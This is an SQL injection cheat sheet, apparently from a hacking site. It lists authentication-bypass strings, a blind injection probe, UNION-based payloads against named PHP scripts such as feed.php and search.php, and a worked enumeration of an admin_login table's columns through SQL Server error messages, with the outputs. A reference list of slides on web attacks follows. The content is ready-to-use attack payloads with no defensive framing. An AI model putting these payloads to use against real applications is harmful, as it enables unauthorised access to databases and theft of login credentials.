~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
								SQL INJECTION						
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

101 OR 1=1   -> 101 is real data    	<- Integer SQL Injection
' or 'a'='a								<- String SQL Injection
'or 1=1--
"or 1=1--
or1=1--
" or "a"="a
') or ('a'='a
admin--
'having 1=1--

[Blind SQL Injection]
101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid=15613) , 2 , 1) ) > 109 ); 

Examples:
--------
SQL Injection in feed.php: 
feed.php?folder=3 and 1=1 UNION select title from item--

with magic_quotes=off:
SQL Injection in search.php:
search.php?rss_query=aa%')) UNION select null,null,null,null,null,null,null,null,null,null,null,title,null from item--
&rss_query_match=exact

Login: 'union select 0,0,0,0 from admin/*
Login: 'union select 1,'user',md5('asasa'),whateveritis from admin/* 

#http://target/[path]/detail.asp?ID='=[SQL]
#http://target/[path]/listings.asp?itemID=[SQL]

Getting Table Names:
-------------------
> http://vuln/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

> http://vuln/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5

> http://vuln/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
								www.hackcraft.com 






==========
REFERENCES: http://www.plus.or.kr/wikix/index.php?display=Web+05Sum (GOOD WIKI)
==========
1 : override phpBB
    * phpbb_vulnerabilities.ppt

2 : imiro wiki
    * Wiki Vulnerabilities.ppt
          o ???? : http://moinmoin.wikiwikiweb.de/
          o wikix : http://wikix.sourceforge.net/
          o secutiryfocus : http://www.securityfocus.com/


freestar? URL Encoded Attack
    * URL Encoded Attacks.ppt
    * Reference : http://www.technicalinfo.net/papers/URLEmbeddedAttacks.html

XSS_Concept.ppt
    * Reference : http://www.technicalinfo.net/papers/CSS.html

override Web Based Session Management
          o Reference : http://www.technicalinfo.net/papers/WebBasedSessionManagement.html 

dna HTTP Response Splitting, Web Cache Poisoning Attacks
          o Reference : http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
          o Web_Cache_Poisoning_by_using_HTTP_Response_Splitting.ppt
		PPT: http://www.plus.or.kr/wikix/file/Web%2005Sum/Web%5FCache%5FPoisoning%5Fby%5Fusing%5FHTTP%5FResponse%5FSplitting.ppt